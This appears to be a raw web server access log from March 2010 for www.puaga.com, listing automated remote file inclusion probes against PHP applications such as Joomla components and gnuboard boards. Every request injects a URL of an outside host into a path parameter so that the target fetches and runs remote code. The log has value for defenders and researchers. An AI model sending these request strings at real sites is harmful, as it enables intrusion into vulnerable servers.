218.55.227.145 - - [05/Mar/2010:04:54:38 -0800] "GET /signin.php?_AMGconfig[cfg_serverpath]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:04:54:38 -0800] "GET /logs//signin.php?_AMGconfig[cfg_serverpath]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:55:14 -0800] "GET /com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:55:14 -0800] "GET /logs/access_100224.log%20%20//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:55:14 -0800] "GET /logs//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:04:55:20 -0800] "GET /logs/access_100218.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:04:55:20 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:04:55:20 -0800] "GET /lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:04:55:27 -0800] "GET /logs/access_100219.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:04:56:05 -0800] "GET /logs/access_100219.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [05/Mar/2010:04:56:27 -0800] "GET /logs/access_100203.log%20%20//delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [05/Mar/2010:04:56:27 -0800] "GET /delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [05/Mar/2010:04:56:27 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:56:40 -0800] "GET /logs/access_100128.log%20%20//component//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:56:40 -0800] "GET /component//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:56:40 -0800] "GET /logs//component//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [05/Mar/2010:04:56:40 -0800] "GET /logs/access_100206.log%20%20//delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [05/Mar/2010:04:56:45 -0800] "GET /logs/access_100217.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://thisrapgame.com/wp-content/themes/ThisRapGame/phpThumb/cache/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.6.109.50 - - [05/Mar/2010:04:56:45 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://thisrapgame.com/wp-content/themes/ThisRapGame/phpThumb/cache/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.6.109.50 - - [05/Mar/2010:04:56:45 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://thisrapgame.com/wp-content/themes/ThisRapGame/phpThumb/cache/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
72.4.236.8 - - [05/Mar/2010:04:56:46 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [05/Mar/2010:04:56:46 -0800] "GET /logs/access_100203.log//delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [05/Mar/2010:04:56:46 -0800] "GET /delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:04:56:51 -0800] "GET /logs/access_100131.log%20%20//signin.php?_AMGconfig[cfg_serverpath]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [05/Mar/2010:04:56:54 -0800] "GET /logs/access_100206.log//delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:04:57:20 -0800] "GET /rsgallery.html.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:04:57:20 -0800] "GET /logs//rsgallery.html.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:04:57:20 -0800] "GET /logs/access_100212.log%20%20//rsgallery.html.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:04:57:24 -0800] "GET /logs/access_100128.log%20%20//rsgallery.html.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [05/Mar/2010:04:57:34 -0800] "GET /logs/access_100221.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:57:43 -0800] "GET /logs/access_100206.log%20%20//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [05/Mar/2010:04:57:57 -0800] "GET /logs/access_100212.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://thisrapgame.com/wp-content/themes/ThisRapGame/phpThumb/cache/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:58:46 -0800] "GET //bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:58:46 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:58:51 -0800] "GET /logs/access_100128.log%20%20///bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:59:04 -0800] "GET //bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:59:11 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:59:11 -0800] "GET /logs/access_100128.log%20%20///bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [05/Mar/2010:04:59:52 -0800] "GET /logs/access_100217.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:04:59:56 -0800] "GET /logs/access_100221.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://mytwitterblog.info/robot.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:04:59:56 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:04:59:57 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:05:00:07 -0800] "GET /logs/access_100215.log%20%20//component//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:00:36 -0800] "GET /logs/access_100214.log%20%20///bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:01:32 -0800] "GET /logs/access_100217.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:01:32 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:01:33 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:01:43 -0800] "GET /logs/access_100222.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:02:00 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:02:00 -0800] "GET /logs/access_100131.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:02:01 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:02:15 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:02:15 -0800] "GET /logs/access_100131.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:02:15 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:02:47 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:02:47 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:02:47 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:05:02:51 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:05:02:51 -0800] "GET /logs/access_100211.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:05:02:51 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:05:03:01 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:05:03:01 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:05:03:01 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:05:03:03 -0800] "GET /logs/access_100224.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:05:03:07 -0800] "GET /logs/access_091220.log/////?_SERVER[DOCUMENT_ROOT]=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:05:03:09 -0800] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:05:03:09 -0800] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:05:03:09 -0800] "GET /logs/access_100209.log//upgrade_album.php?GALLERY_BASEDIR=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [05/Mar/2010:05:03:10 -0800] "GET /homepage.php?sel=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [05/Mar/2010:05:03:11 -0800] "GET /logs/access_100210.log%20%20/homepage.php?sel=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [05/Mar/2010:05:03:11 -0800] "GET /logs/homepage.php?sel=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:05:03:16 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:05:03:16 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:05:03:16 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:05:03:20 -0800] "GET /errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:05:03:20 -0800] "GET /logs//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:03:26 -0800] "GET /logs/access_100217.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:03:38 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:03:38 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:03:38 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:05:03:40 -0800] "GET /logs/access_100211.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:03:54 -0800] "GET /logs/access_100222.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:03:57 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:03:58 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:03:58 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:04:03 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [05/Mar/2010:05:04:38 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [05/Mar/2010:05:04:38 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [05/Mar/2010:05:04:38 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:05:04:45 -0800] "GET /logs/access_100217.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:05:08 -0800] "GET //bbs/delete_all.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:05:08 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:05:08 -0800] "GET /logs/access_100222.log%20%20///bbs/delete_all.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:05:10 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:05:10 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:05:11 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:05:06:05 -0800] "GET /logs/access_100217.log//upgrade_album.php?GALLERY_BASEDIR=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:06:12 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:05:06:17 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:05:06:34 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:05:06:34 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:05:06:35 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:05:06:41 -0800] "GET /logs/access.log//signin.php?_AMGconfig[cfg_serverpath]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:05:06:47 -0800] "GET /logs/access_100225.log//signin.php?_AMGconfig[cfg_serverpath]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:06:47 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:06:53 -0800] "GET //bbs/delete_all.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:06:53 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:06:53 -0800] "GET /logs/access_100222.log%20%20///bbs/delete_all.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:06:54 -0800] "GET /logs/access_100222.log%20%20///bbs/delete_all.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:06:54 -0800] "GET //bbs/delete_all.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:06:54 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:07:23 -0800] "GET /logs/access_100211.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [05/Mar/2010:05:07:58 -0800] "GET /logs/access_100221.log/////?_SERVER[DOCUMENT_ROOT]=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [05/Mar/2010:05:07:58 -0800] "GET /logs/access_100226.log/////?_SERVER[DOCUMENT_ROOT]=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
